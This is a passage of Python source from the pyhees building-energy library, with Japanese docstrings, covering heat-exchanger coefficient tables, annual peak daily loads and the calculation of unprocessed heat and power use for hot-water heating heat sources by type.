if HeatExchangerType == '1':
return get_table_n_3()[0][0]
elif HeatExchangerType == '2':
return get_table_n_3()[1][0]
elif HeatExchangerType == '3':
return get_table_n_3()[2][0]
elif HeatExchangerType == '4':
return get_table_n_3()[3][0]
elif HeatExchangerType == '5':
return get_table_n_3()[4][0]
else:
raise ValueError(HeatExchangerType)
def get_b_gsRW_H(HeatExchangerType):
"""熱交換器タイプに応じた係数b_gsRW_Hの取得
Args:
HeatExchangerType(str): 熱交換器タイプ (-)
Returns:
float: 熱交換器タイプに応じた係数b_gsRW_Hの取得
"""
if HeatExchangerType == '1':
return get_table_n_3()[0][1]
elif HeatExchangerType == '2':
return get_table_n_3()[1][1]
elif HeatExchangerType == '3':
return get_table_n_3()[2][1]
elif HeatExchangerType == '4':
return get_table_n_3()[3][1]
elif HeatExchangerType == '5':
return get_table_n_3()[4][1]
else:
raise ValueError(HeatExchangerType)
def get_c_gsRW_H(HeatExchangerType):
"""熱交換器タイプに応じた係数a_gsRW_Hの取得
Args:
HeatExchangerType(str): 熱交換器タイプ (-)
Returns:
float: 熱交換器タイプに応じた係数a_gsRW_Hの取得
"""
if HeatExchangerType == '1':
return get_table_n_3()[0][2]
elif HeatExchangerType == '2':
return get_table_n_3()[1][2]
elif HeatExchangerType == '3':
return get_table_n_3()[2][2]
elif HeatExchangerType == '4':
return get_table_n_3()[3][2]
elif HeatExchangerType == '5':
return get_table_n_3()[4][2]
else:
raise ValueError(HeatExchangerType)
def get_d_gsRW_H(HeatExchangerType):
"""熱交換器タイプに応じた係数b_gsRW_Hの取得
Args:
HeatExchangerType(str): 熱交換器タイプ (-)
Returns:
float: 熱交換器タイプに応じた係数b_gsRW_Hの取得
"""
if HeatExchangerType == '1':
return get_table_n_3()[0][3]
elif HeatExchangerType == '2':
return get_table_n_3()[1][3]
elif HeatExchangerType == '3':
return get_table_n_3()[2][3]
elif HeatExchangerType == '4':
return get_table_n_3()[3][3]
elif HeatExchangerType == '5':
return get_table_n_3()[4][3]
else:
raise ValueError(HeatExchangerType)
def get_table_n_3():
"""表N.3 係数
Args:
Returns:
list: 表N.3 係数
"""
table_n_3 = [
(3.1672, -0.4273, -0.0444, 0.0442),
(5.9793, -1.0687, -0.1613, 0.1047),
(8.3652, -1.5946, -0.2486, 0.1546),
(9.9065, -2.1827, -0.3454, 0.2072),
(10.2898, -2.8727, -0.3270, 0.2700)
]
return table_n_3
def get_R_L_max(L_max_H, L_max_C):
"""1日当たりの暖房負荷の年間最大値と1日当たりの冷房負荷の年間最大値の和に対する、これらの差の比(-)(20a)
Args:
L_max_H(float): 1日当たりの暖房負荷の年間最大値(MJ/d)
L_max_C(float): 1日当たりの冷房全熱負荷の年間最大値(MJ/d)
Returns:
float: 1日当たりの暖房負荷の年間最大値と1日当たりの冷房負荷の年間最大値の和に対する、これらの差の比(-)(20a)
"""
# 1日当たりの暖房負荷の年間最大値と1日当たりの冷房負荷の年間最大値の和に対する、これらの差の比(-)(20a)
R_L_max = (L_max_C - L_max_H) / (L_max_C + L_max_H)
return R_L_max
def get_L_max_H(L_H_x_t_i):
"""1日当たりの暖房負荷の年間最大値(MJ/d)(20b)
Args:
L_H_x_t_i(ndarray): 暖冷房区画iの1時間当たりの暖房負荷
Returns:
float: 1日当たりの暖房負荷の年間最大値(MJ/d)
"""
# L_H_x_t_iは暖冷房区画毎に365日×24時間分の負荷を持った2次元配列
# 暖冷房区画軸合算(暖冷房区画の次元をなくす)
L_H_x_t = np.sum(L_H_x_t_i, axis=0)
# 1次元配列を2次元配列に形状変換する
L_H_x_t = np.reshape(L_H_x_t, (365, 24))
# 時間軸合算
L_H_x = np.sum(L_H_x_t, axis=1)
# 1日当たりの暖房負荷の年間最大値(MJ/d)(20b)
L_max_H = np.max(L_H_x)
return L_max_H
def get_L_max_C(L_CS_x_t_i, L_CL_x_t_i):
"""1日当たりの冷房全熱負荷の年間最大値(MJ/d)(20c)
Args:
L_CS_x_t_i(ndarray): 日付dの時刻tにおける暖冷房区画iの冷房顕熱負荷 (MJ/h)
L_CL_x_t_i(ndarray): 日付dの時刻tにおける暖冷房区画iの冷房潜熱負荷 (MJ/h)
Returns:
float: 1日当たりの冷房全熱負荷の年間最大値(MJ/d)
"""
# 暖冷房区画軸合算(暖冷房区画の次元をなくす)
L_CS_x_t = np.sum(L_CS_x_t_i, axis=0)
L_CL_x_t = np.sum(L_CL_x_t_i, axis=0)
# L_CS_x_tとL_CL_x_tの要素同士を足す
L_C_x_t = L_CS_x_t + L_CL_x_t
# 1次元配列を2次元配列に形状変換する
L_C_x_t = np.reshape(L_C_x_t, (365, 24))
# 時間軸合算
L_C_x = np.sum(L_C_x_t, axis=1)
# 1日当たりの冷房全熱負荷の年間最大値(MJ/d)(20c)
L_max_C = np.max(L_C_x)
return L_max_C
```
#### File: src/pyhees/section4_7.py
```python
import numpy as np
import pyhees.section3_1 as ld
import pyhees.section4_7_a as hs_oil
import pyhees.section4_7_b as hs_gas
import pyhees.section4_7_c as hs_eheater
import pyhees.section4_7_d as hs_ehpump
import pyhees.section4_7_e as hs_gas_hybrid
import pyhees.section4_7_f as hs_hybrid_gas
import pyhees.section4_7_g as hs_whybrid
import pyhees.section4_7_n as hs_ghpump
import pyhees.section4_7_j as rad_panel
import pyhees.section4_7_k as rad_fanc
import pyhees.section4_7_l as rad_floor
import pyhees.section4_7_i as pipe
from pyhees.section4_7_common import get_Q_out_H_hs_d_t
from pyhees.section11_1 import \
load_outdoor, \
get_Theta_ex, \
get_X_ex, \
calc_h_ex, \
get_Theta_ex_a_Ave, \
get_Theta_ex_d_Ave_d, \
get_Theta_ex_H_Ave
# ============================================================================
# 5. 最大暖房出力
# ============================================================================
def calc_Q_max_H_d_t_i(radiator, A_HCZ, Theta_SW, region, mode, R_type):
"""最大暖房出力
Args:
radiator(dict): 放熱器仕様
A_HCZ(float): 暖冷房区画の床面積
Theta_SW(float): 往き温水温度
region(int): 省エネルギー地域区分
mode(str): 運転モード 'い', 'ろ', 'は'
R_type(string): 居室の形式
Returns:
ndarray: 最大暖房出力
"""
return calc_Q_max_H_rad_d_t_i(radiator, A_HCZ, Theta_SW, region, mode, R_type)
# ============================================================================
# 6. エネルギー消費量
# ============================================================================
# ============================================================================
# 6.1 消費電力量
# ============================================================================
def calc_E_E_H_d_t(H_HS, H_MR, H_OR, A_A, A_MR, A_OR, region, mode_MR, mode_OR, L_T_H_rad, L_CS_x_t, L_CL_x_t, CG=None):
"""消費電力量 (1)
Args:
H_HS(dict): 温水暖房機の仕様
H_MR(dict): 暖房機器の仕様
H_OR(dict): 暖房機器の仕様
A_MR(float): 主たる居室の床面積 (m2)
A_OR(float): その他の居室の床面積 (m2)
region(int): 省エネルギー地域区分
mode_MR(str): 主たる居室の運転モード 'い', 'ろ', 'は'
mode_OR(str): その他の居室の運転モード 'い', 'ろ', 'は'
L_T_H_rad(ndarray): 放熱器の暖房負荷
L_CS_x_t(ndarray): 暖冷房区画の冷房顕熱負荷
L_CL_x_t(ndarray): 暖冷房区画の冷房潜熱負荷
CG(dict, optional): コージェネレーション設備の仕様 (Default value = None)
A_A: returns: 消費電力量 (1)
Returns:
ndarray: 消費電力量 (1)
"""
rad_types = get_rad_type_list()
rad_list = get_rad_list(H_MR, H_OR)
E_E_hs_d_t = calc_E_E_hs_d_t(H_HS, H_MR, H_OR, region, A_A, A_MR, A_OR, mode_MR, mode_OR, L_T_H_rad, CG, L_CS_x_t, L_CL_x_t)
E_E_rad_d_t = np.zeros((5, 24 * 365))
for i in [1, 3, 4, 5]:
if rad_list[i - 1] is None:
continue
if rad_list[i - 1]['type'] in rad_types:
radiator = rad_list[i - 1]
R_type = '主たる居室' if i == 1 else 'その他の居室'
mode = mode_MR if i == 1 else mode_OR
A_HCZ = calc_A_HCZ_i(i, A_A, A_MR, A_OR)
Theta_SW_hs_op = get_Theta_SW_hs_op(H_HS['type'], CG)
p_hs_d_t = calc_p_hs_d_t(Theta_SW_hs_op, rad_list, L_T_H_rad, A_A, A_MR, A_OR, region, mode_MR, mode_OR)
Theta_SW_d_t = get_Theta_SW_d_t(Theta_SW_hs_op, p_hs_d_t)
Q_max_H_rad_d_t_i = calc_Q_max_H_rad_d_t_i(radiator, A_HCZ, Theta_SW_d_t, region, mode, R_type)
Q_T_H_rad_d_t_i = calc_Q_T_H_rad_d_t_i(Q_max_H_rad_d_t_i, L_T_H_rad[i - 1])
E_E_rad_d_t_i = calc_E_E_rad_d_t_i(i, radiator, Q_T_H_rad_d_t_i, Theta_SW_d_t, A_A, A_MR, A_OR, region, mode,
R_type)
E_E_rad_d_t[i - 1, :] = E_E_rad_d_t_i
print('{} E_E_rad_d_t_{} = {} [KWh] (L_T_H_rad_d_t_{} = {} [MJ])'.format(radiator['type'], i,
np.sum(E_E_rad_d_t_i), i,
np.sum(L_T_H_rad[i - 1])))
E_E_H_d_t = E_E_hs_d_t + np.sum(E_E_rad_d_t, axis=0)
return E_E_H_d_t
# ============================================================================
# 6.2 灯油消費量
# ============================================================================
def calc_E_K_H_d_t(H_HS, H_MR, H_OR, A_A, A_MR, A_OR, region, mode_MR, mode_OR, L_T_H_rad, CG):
"""灯油消費量 (2)
Args:
H_HS(dict): 温水暖房機の仕様
H_MR(dict): 暖房機器の仕様
H_OR(dict): 暖房機器の仕様
A_A(float): 床面積の合計 (m2)
A_MR(float): 主たる居室の床面積 (m2)
A_OR(float): その他の居室の床面積 (m2)
region(int): 省エネルギー地域区分
mode_MR(str): 主たる居室の運転モード 'い', 'ろ', 'は'
mode_OR(str): その他の居室の運転モード 'い', 'ろ', 'は'
L_T_H_rad(ndarray): 放熱器の暖房負荷
CG(dict): コージェネレーションの機器
Returns:
ndarray: 灯油消費量 (2)
"""
return calc_E_K_hs_d_t(H_HS, H_MR, H_OR, A_A, A_MR, A_OR, region, mode_MR, mode_OR, L_T_H_rad, CG)
# ============================================================================
# 6.3 ガス消費量
# ============================================================================
def calc_E_G_H_d_t(H_HS, H_MR, H_OR, A_A, A_MR, A_OR, region, mode_MR, mode_OR, L_T_H_rad, CG):
"""ガス消費量 (3)
Args:
H_HS(dict): 温水暖房機の仕様
H_MR(dict): 暖房機器の仕様
H_OR(dict): 暖房機器の仕様
A_A(float): 床面積の合計 (m2)
A_MR(float): 主たる居室の床面積 (m2)
A_OR(float): その他の居室の床面積 (m2)
region(int): 省エネルギー地域区分
mode_MR(str): 主たる居室の運転モード 'い', 'ろ', 'は'
mode_OR(str): その他の居室の運転モード 'い', 'ろ', 'は'
L_T_H_rad(ndarray): 放熱器の暖房負荷
CG(dict): コージェネレーションの機器
Returns:
ndarray: ガス消費量 (3)
"""
return calc_E_G_hs_d_t(H_HS, H_MR, H_OR, A_A, A_MR, A_OR, region, mode_MR, mode_OR, L_T_H_rad, CG)
# ============================================================================
# 6.4 その他の燃料による一次エネルギー消費量
# ============================================================================
def calc_E_M_H_d_t(H_HS):
"""その他の燃料による一次エネルギー消費量 (4)
Args:
H_HS(dict): 温水暖房機の仕様
Returns:
ndarray: その他の燃料による一次エネルギー消費量 (4)
"""
return get_E_M_hs_d_t(H_HS)
# ============================================================================
# 7. 温水暖房熱源機のエネルギー消費量
# ============================================================================
def calc_Q_UT_hs_d_t(H_HS, H_MR, H_OR, region, A_A, A_MR, A_OR, mode_MR, mode_OR, L_T_H_rad, CG, L_CS_x_t_i, L_CL_x_t_i):
"""温水暖房用熱源機の未処理
Args:
H_HS(dict): 温水暖房機の仕様
H_MR(dict): 暖房機器の仕様
H_OR(dict): 暖房機器の仕様
region(int): 省エネルギー地域区分
A_A(float): 床面積の合計 (m2)
A_MR(float): 主たる居室の床面積 (m2)
A_OR(float): その他の居室の床面積 (m2)
mode_MR(str): 主たる居室の運転モード 'い', 'ろ', 'は'
mode_OR(str): その他の居室の運転モード 'い', 'ろ', 'は'
L_T_H_rad(ndarray): 放熱器の暖房負荷
CG(dict): コージェネレーションの機器
L_CS_x_t_i(ndarray): 日付dの時刻tにおける暖冷房区画iの冷房顕熱負荷 (MJ/h)
L_CL_x_t_i(ndarray): 日付dの時刻tにおける暖冷房区画iの冷房潜熱負荷 (MJ/h)
Returns:
ndarray: 温水暖房用熱源機の未処理
"""
hs_type = H_HS['type']
# 主たる居室、その他の居室という単位で設定された放熱機器を暖房区画ごとの配列に変換
rad_list = get_rad_list(H_MR, H_OR)
# 温水暖房用熱源機の往き温水温度
Theta_SW_hs_op = get_Theta_SW_hs_op(hs_type, CG)
p_hs = calc_p_hs_d_t(Theta_SW_hs_op, rad_list, L_T_H_rad, A_A, A_MR, A_OR, region, mode_MR, mode_OR)
Theta_SW_d_t = get_Theta_SW_d_t(Theta_SW_hs_op, p_hs)
# 温水暖房用熱源機の温水熱需要
Q_dmd_H_hs_d_t = calc_Q_dmd_H_hs_d_t(rad_list, H_HS['pipe_insulation'], H_HS['underfloor_pipe_insulation'],
Theta_SW_d_t, A_A, A_MR, A_OR, region,
mode_MR, mode_OR, L_T_H_rad)
# 処理暖房負荷
Q_T_H_rad = np.zeros((5, 24 * 365))
for i in [1, 3, 4, 5]:
if rad_list[i - 1] is None:
continue
# 1時間当たりの暖冷房区画iに設置された放熱器の最大暖房出力
A_HCZ = calc_A_HCZ_i(i, A_A, A_MR, A_OR)
R_type = '主たる居室' if i == 1 else 'その他の居室'
mode = mode_MR if i == 1 else mode_OR
Q_max_H_rad_d_t_i = calc_Q_max_H_rad_d_t_i(rad_list[i - 1], A_HCZ, Theta_SW_d_t, region, mode, R_type)
# 1時間当たりの暖冷房区画iに設置された放熱器の処理暖房負荷
Q_T_H_rad[i - 1, :] = calc_Q_T_H_rad_d_t_i(Q_max_H_rad_d_t_i, L_T_H_rad[i - 1])
# 温水暖房用熱源機の温水供給運転率
r_WS_hs = calc_r_WS_hs_d_t(rad_list, Q_dmd_H_hs_d_t, Q_T_H_rad, Theta_SW_d_t, region, A_A, A_MR, A_OR, mode_MR)
if hs_type in ['石油温水暖房機', '石油給湯温水暖房機', '石油従来型温水暖房機', '石油従来型給湯温水暖房機', '石油潜熱回収型温水暖房機', '石油潜熱回収型給湯温水暖房機']:
# 定格効率
if 'e_rtd_hs' in H_HS:
e_rtd = H_HS['e_rtd_hs']
else:
e_rtd = hs_oil.get_e_rtd_default(hs_type)
# 温水暖房用熱源機の温水熱需要
Q_dmd_H_hs_d_t = calc_Q_dmd_H_hs_d_t(rad_list, H_HS['pipe_insulation'], H_HS['underfloor_pipe_insulation'],
Theta_SW_d_t, A_A, A_MR, A_OR, region,
mode_MR, mode_OR, L_T_H_rad)
# 定格能力の計算のためのパラメータの取得
rad_types = get_rad_type_list()
has_MR_hwh = H_MR['type'] in rad_types
if H_OR is not None:
has_OR_hwh = H_OR['type'] in rad_types
else:
has_OR_hwh = False
# 温水暖房熱源機の定格能力
q_rtd_hs = hs_oil.calc_q_rtd_hs(region, A_A, A_MR, A_OR, mode_MR, mode_OR, has_MR_hwh, has_OR_hwh)
# 最大暖房出力
Q_max_H_hs_d_t = hs_oil.get_Q_max_H_hs(q_rtd_hs)
# 温水暖房用熱源機の暖房出力
Q_out_H_hs = get_Q_out_H_hs_d_t(Q_dmd_H_hs_d_t, Q_max_H_hs_d_t)
return Q_dmd_H_hs_d_t - Q_out_H_hs
elif hs_type in ['ガス温水暖房機', 'ガス給湯温水暖房機', 'ガス従来型温水暖房機', 'ガス従来型給湯温水暖房機', 'ガス潜熱回収型温水暖房機', 'ガス潜熱回収型給湯温水暖房機']:
# 定格効率
if 'e_rtd_hs' in H_HS:
e_rtd = H_HS['e_rtd_hs']
else:
e_rtd = hs_gas.get_e_rtd_default(hs_type)
# 温水暖房用熱源機の温水熱需要
Q_dmd_H_hs_d_t = calc_Q_dmd_H_hs_d_t(rad_list, H_HS['pipe_insulation'], H_HS['underfloor_pipe_insulation'],
Theta_SW_d_t, A_A, A_MR, A_OR, region,
mode_MR, mode_OR, L_T_H_rad)
# 定格能力の計算のためのパラメータの取得
rad_types = get_rad_type_list()
has_MR_hwh = H_MR['type'] in rad_types
if H_OR is not None:
has_OR_hwh = H_OR['type'] in rad_types
else:
has_OR_hwh = False
# 温水暖房熱源機の定格能力
q_rtd_hs = hs_gas.calc_q_rtd_hs(region, A_A, A_MR, A_OR, mode_MR, mode_OR, has_MR_hwh, has_OR_hwh)
# 最大暖房出力
Q_max_H_hs_d_t = hs_gas.get_Q_max_H_hs(q_rtd_hs)
# 温水暖房用熱源機の暖房出力
Q_out_H_hs = get_Q_out_H_hs_d_t(Q_dmd_H_hs_d_t, Q_max_H_hs_d_t)
return Q_dmd_H_hs_d_t - Q_out_H_hs
elif hs_type == '電気ヒーター温水暖房機' or hs_type == '電気ヒーター給湯温水暖房機':
# 最大出力の計算のためのパラメータの取得
rad_types = get_rad_type_list()
has_MR_hwh = H_MR['type'] in rad_types
if H_OR is not None:
has_OR_hwh = H_OR['type'] in rad_types
else:
has_OR_hwh = False
# 最大出力
Q_max_H_hs_d_t = hs_eheater.calc_Q_max_H_hs(
region=region,
A_A=A_A,
A_MR=A_MR,
A_OR=A_OR,
mode_MR=mode_MR,
mode_OR=mode_OR,
has_MR_hwh=has_MR_hwh,
has_OR_hwh=has_OR_hwh
)
# 温水暖房用熱源機の暖房出力
Q_out_H_hs_d_t = get_Q_out_H_hs_d_t(Q_dmd_H_hs_d_t, Q_max_H_hs_d_t)
return Q_dmd_H_hs_d_t - Q_out_H_hs_d_t
elif hs_type == '電気ヒートポンプ温水暖房機':
# 定格の計算のためのパラメータの取得
rad_types = get_rad_type_list()
has_MR_hwh = H_MR['type'] in rad_types
if H_OR is not None:
has_OR_hwh = H_OR['type'] in rad_types
else:
has_OR_hwh = False
# 定格能力
q_rtd_hs = hs_ehpump.calc_q_rtd_hs(
region=region,
A_A=A_A,
A_MR=A_MR,
A_OR=A_OR,
mode_MR=mode_MR,
mode_OR=mode_OR,
has_MR_hwh=has_MR_hwh,
has_OR_hwh=has_OR_hwh
)
# 外気条件の取得
outdoor = load_outdoor()
Theta_ex = get_Theta_ex(region, outdoor)
X_ex = get_X_ex(region, outdoor)
h_ex = calc_h_ex(X_ex, Theta_ex)
# 最大出力
Q_max_H_hs_d_t = hs_ehpump.calc_Q_max_H_hs(
q_rtd_hs=q_rtd_hs,
Theta_SW_hs=Theta_SW_d_t,
Theta_ex=Theta_ex,
h_ex=h_ex
)
# 温水暖房用熱源機の暖房出力
Q_out_H_hs_d_t = get_Q_out_H_hs_d_t(Q_dmd_H_hs_d_t, Q_max_H_hs_d_t)
return Q_dmd_H_hs_d_t - Q_out_H_hs_d_t
elif hs_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:ガス瞬間式、暖房熱源:電気ヒートポンプ・ガス瞬間式併用)':
return np.zeros(24 * 365)
elif hs_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:電気ヒートポンプ・ガス瞬間式併用、暖房熱源:ガス瞬間式)(試験された値を用いる)' or \
hs_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:電気ヒートポンプ・ガス瞬間式併用、暖房熱源:ガス瞬間式)(仕様による)':
# 温水暖房用熱源機の温水熱需要
Q_dmd_H_hs_d_t = calc_Q_dmd_H_hs_d_t(rad_list, H_HS['pipe_insulation'], H_HS['underfloor_pipe_insulation'],
Theta_SW_d_t, A_A, A_MR, A_OR, region,
mode_MR, mode_OR, L_T_H_rad)
# 定格能力の計算のためのパラメータの取得
rad_types = get_rad_type_list()
has_MR_hwh = H_MR['type'] in rad_types
if H_OR is not None:
has_OR_hwh = H_OR['type'] in rad_types
else:
has_OR_hwh = False
# 温水暖房熱源機の定格能力
q_rtd_hs = hs_gas.calc_q_rtd_hs(region, A_A, A_MR, A_OR, mode_MR, mode_OR, has_MR_hwh, has_OR_hwh)
# 最大暖房出力
Q_max_H_hs_d_t = hs_gas.get_Q_max_H_hs(q_rtd_hs)
# 温水暖房用熱源機の暖房出力
Q_out_H_hs = get_Q_out_H_hs_d_t(Q_dmd_H_hs_d_t, Q_max_H_hs_d_t)
return Q_dmd_H_hs_d_t - Q_out_H_hs
elif hs_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:電気ヒートポンプ・ガス瞬間式併用、暖房熱源:電気ヒートポンプ・ガス瞬間式併用)':
return np.zeros(24 * 365)
elif hs_type == 'コージェネレーションを使用する':
return np.zeros(24 * 365)
elif hs_type == '地中熱ヒートポンプ温水暖房機':
# 外気条件の取得
# 外気温
outdoor = load_outdoor()
Theta_ex = get_Theta_ex(region, outdoor)
Theta_ex_a_Ave = get_Theta_ex_a_Ave(Theta_ex)
Theta_ex_d_Ave_d = get_Theta_ex_d_Ave_d(Theta_ex)
Theta_ex_H_Ave = get_Theta_ex_H_Ave(Theta_ex, L_T_H_rad)
# 定格の計算のためのパラメータの取得
rad_types = get_rad_type_list()
has_MR_hwh = H_MR['type'] in rad_types
if H_OR is not None:
has_OR_hwh = H_OR['type'] in rad_types
else:
has_OR_hwh = False
# 定格能力 付録Hに定める温水暖房用熱源機の最大能力 q_max_hs に等しい
q_rtd_hs = hs_ghpump.calc_q_rtd_hs(
region=region,
A_A=A_A,
A_MR=A_MR,
A_OR=A_OR,
mode_MR=mode_MR,
mode_OR=mode_OR,
has_MR_hwh=has_MR_hwh,
has_OR_hwh=has_OR_hwh
)
# 最大出力
Q_max_H_hs_d_t = hs_ghpump.calc_Q_max_H_hs_d_t(
Theta_SW_d_t=Theta_SW_d_t,
Theta_ex_d_Ave_d=Theta_ex_d_Ave_d,
Theta_ex_H_Ave=Theta_ex_H_Ave,
Theta_ex_a_Ave=Theta_ex_a_Ave,
q_max_hs=q_rtd_hs,
L_H_x_t_i=L_T_H_rad,
L_CS_x_t_i=L_CS_x_t_i,
L_CL_x_t_i=L_CL_x_t_i,
HeatExchangerType=H_HS['HeatExchanger']
)
# 温水暖房用熱源機の暖房出力
Q_out_H_hs_d_t = get_Q_out_H_hs_d_t(Q_dmd_H_hs_d_t, Q_max_H_hs_d_t)
return Q_dmd_H_hs_d_t - Q_out_H_hs_d_t
else:
raise ValueError(hs_type)
# ============================================================================
# 7.1 エネルギー消費量
# ============================================================================
def calc_E_E_hs_d_t(H_HS, H_MR, H_OR, region, A_A, A_MR, A_OR, mode_MR, mode_OR, L_T_H_rad, CG, L_CS_x_t_i, L_CL_x_t_i):
"""温水暖房用熱源機の消費電力量
Args:
H_HS(dict): 温水暖房機の仕様
H_MR(dict): 暖房機器の仕様
H_OR(dict): 暖房機器の仕様
region(int): 省エネルギー地域区分
A_A(float): 床面積の合計 (m2)
A_MR(float): 主たる居室の床面積 (m2)
A_OR(float): その他の居室の床面積 (m2)
mode_MR(str): 主たる居室の運転モード 'い', 'ろ', 'は'
mode_OR(str): その他の居室の運転モード 'い', 'ろ', 'は'
L_T_H_rad(ndarray): 放熱器の暖房負荷
CG(dict): コージェネレーションの機器
L_CS_x_t_i(ndarray): 日付dの時刻tにおける暖冷房区画iの冷房顕熱負荷 (MJ/h)
L_CL_x_t_i(ndarray): 日付dの時刻tにおける暖冷房区画iの冷房潜熱負荷 (MJ/h)
Returns:
ndarray: 水暖房用熱源機の消費電力量
"""
hs_type = H_HS['type']
# 主たる居室、その他の居室という単位で設定された放熱機器を暖房区画ごとの配列に変換
rad_list = get_rad_list(H_MR, H_OR)
# 温水暖房用熱源機の往き温水温度
Theta_SW_hs_op = get_Theta_SW_hs_op(hs_type, CG)
p_hs = calc_p_hs_d_t(Theta_SW_hs_op, rad_list, L_T_H_rad, A_A, A_MR, A_OR, region, mode_MR, mode_OR)
Theta_SW_d_t = get_Theta_SW_d_t(Theta_SW_hs_op, p_hs)
# 温水暖房用熱源機の温水熱需要
Q_dmd_H_hs_d_t = calc_Q_dmd_H_hs_d_t(rad_list, H_HS['pipe_insulation'], H_HS['underfloor_pipe_insulation'],
Theta_SW_d_t, A_A, A_MR, A_OR, region,
mode_MR, mode_OR, L_T_H_rad)
# 処理暖房負荷
Q_T_H_rad = np.zeros((5, 24 * 365))
for i in [1, 3, 4, 5]:
if rad_list[i - 1] is None:
continue
# 1時間当たりの暖冷房区画iに設置された放熱器の最大暖房出力
A_HCZ = calc_A_HCZ_i(i, A_A, A_MR, A_OR)
R_type = '主たる居室' if i == 1 else 'その他の居室'
mode = mode_MR if i == 1 else mode_OR
Q_max_H_rad_d_t_i = calc_Q_max_H_rad_d_t_i(rad_list[i - 1], A_HCZ, Theta_SW_d_t, region, mode, R_type)
# 1時間当たりの暖冷房区画iに設置された放熱器の処理暖房負荷
Q_T_H_rad[i - 1, :] = calc_Q_T_H_rad_d_t_i(Q_max_H_rad_d_t_i, L_T_H_rad[i - 1])
# 温水暖房用熱源機の温水供給運転率
r_WS_hs = calc_r_WS_hs_d_t(rad_list, Q_dmd_H_hs_d_t, Q_T_H_rad, Theta_SW_d_t, region, A_A, A_MR, A_OR, mode_MR)
if hs_type in ['石油温水暖房機', '石油給湯温水暖房機', '石油従来型温水暖房機', '石油従来型給湯温水暖房機', '石油潜熱回収型温水暖房機', '石油潜熱回収型給湯温水暖房機']:
# 温水暖房用熱源機の灯油消費量
E_K_hs = calc_E_K_hs_d_t(H_HS, H_MR, H_OR, A_A, A_MR, A_OR, region, mode_MR, mode_OR, L_T_H_rad, CG)
E_E_hs = hs_oil.calc_E_E_hs(
hs_type=hs_type,
r_WS_hs=r_WS_hs,
E_K_hs=E_K_hs
)
elif hs_type in ['ガス温水暖房機', 'ガス給湯温水暖房機', 'ガス従来型温水暖房機', 'ガス従来型給湯温水暖房機', 'ガス潜熱回収型温水暖房機', 'ガス潜熱回収型給湯温水暖房機']:
# 温水暖房用熱源機のガス消費量
E_G_hs = calc_E_G_hs_d_t(H_HS, H_MR, H_OR, A_A, A_MR, A_OR, region, mode_MR, mode_OR, L_T_H_rad, CG)
E_E_hs = hs_gas.calc_E_E_hs(
r_WS_hs=r_WS_hs,
E_G_hs=E_G_hs
)
elif hs_type == '電気ヒーター温水暖房機' or hs_type == '電気ヒーター給湯温水暖房機':
# 最大出力の計算のためのパラメータの取得
rad_types = get_rad_type_list()
has_MR_hwh = H_MR['type'] in rad_types
if H_OR is not None:
has_OR_hwh = H_OR['type'] in rad_types
else:
has_OR_hwh = False
# 最大出力
Q_max_H_hs_d_t = hs_eheater.calc_Q_max_H_hs(
region=region,
A_A=A_A,
A_MR=A_MR,
A_OR=A_OR,
mode_MR=mode_MR,
mode_OR=mode_OR,
has_MR_hwh=has_MR_hwh,
has_OR_hwh=has_OR_hwh
)
# 温水暖房用熱源機の暖房出力
Q_out_H_hs_d_t = get_Q_out_H_hs_d_t(Q_dmd_H_hs_d_t, Q_max_H_hs_d_t)
E_E_hs = hs_eheater.calc_E_E_hs(
Q_out_H_hs=Q_out_H_hs_d_t,
r_WS_hs=r_WS_hs
)
elif hs_type == '電気ヒートポンプ温水暖房機':
# 定格の計算のためのパラメータの取得
rad_types = get_rad_type_list()
has_MR_hwh = H_MR['type'] in rad_types
if H_OR is not None:
has_OR_hwh = H_OR['type'] in rad_types
else:
has_OR_hwh = False
# 定格能力
q_rtd_hs = hs_ehpump.calc_q_rtd_hs(
region=region,
A_A=A_A,
A_MR=A_MR,
A_OR=A_OR,
mode_MR=mode_MR,
mode_OR=mode_OR,
has_MR_hwh=has_MR_hwh,
has_OR_hwh=has_OR_hwh
)
# 外気条件の取得
outdoor = load_outdoor()
Theta_ex = get_Theta_ex(region, outdoor)
X_ex = get_X_ex(region, outdoor)
h_ex = calc_h_ex(X_ex, Theta_ex)
# 最大出力
Q_max_H_hs_d_t = hs_ehpump.calc_Q_max_H_hs(
q_rtd_hs=q_rtd_hs,
Theta_SW_hs=Theta_SW_d_t,
Theta_ex=Theta_ex,
h_ex=h_ex
)
# 温水暖房用熱源機の暖房出力
Q_out_H_hs_d_t = get_Q_out_H_hs_d_t(Q_dmd_H_hs_d_t, Q_max_H_hs_d_t)
# 1時間当たりの熱源機の消費電力量 (kWh/h)
E_E_hs = hs_ehpump.calc_E_E_hs(
Q_out_H_hs=Q_out_H_hs_d_t,
Q_max_H_hs=Q_max_H_hs_d_t,
Q_dmd_H_hs_d_t=Q_dmd_H_hs_d_t,
Theta_SW_hs=Theta_SW_d_t,
Theta_ex=Theta_ex,
q_rtd_hs=q_rtd_hs
)
elif hs_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:ガス瞬間式、暖房熱源:電気ヒートポンプ・ガス瞬間式併用)':
# 外気温
outdoor = load_outdoor()
Theta_ex = get_Theta_ex(region, outdoor)
X_ex = get_X_ex(region, outdoor)
h_ex = calc_h_ex(X_ex, Theta_ex)
# 戻り温水温度 (℃)
Theta_RW_hs = calc_Theta_RW_hs_d_t(Theta_SW_d_t, rad_list, H_HS['pipe_insulation'],
H_HS['underfloor_pipe_insulation'], A_A, A_MR, A_OR, region,
mode_MR, mode_OR, L_T_H_rad)
# 1時間当たりの熱源機の消費電力量 (kWh/h)
E_E_hs = hs_gas_hybrid.calc_E_E_hs(
Q_dmd_H_hs_d_t=Q_dmd_H_hs_d_t,
Theta_RW_hs=Theta_RW_hs,
Theta_ex=Theta_ex,
h_ex=h_ex,
Theta_SW_d_t=Theta_SW_d_t,
TU_place=H_HS['TU_place']
)
elif hs_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:電気ヒートポンプ・ガス瞬間式併用、暖房熱源:ガス瞬間式)(試験された値を用いる)' or \
hs_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:電気ヒートポンプ・ガス瞬間式併用、暖房熱源:ガス瞬間式)(仕様による)':
# 温水暖房用熱源機のガス消費量 (MJ/h)
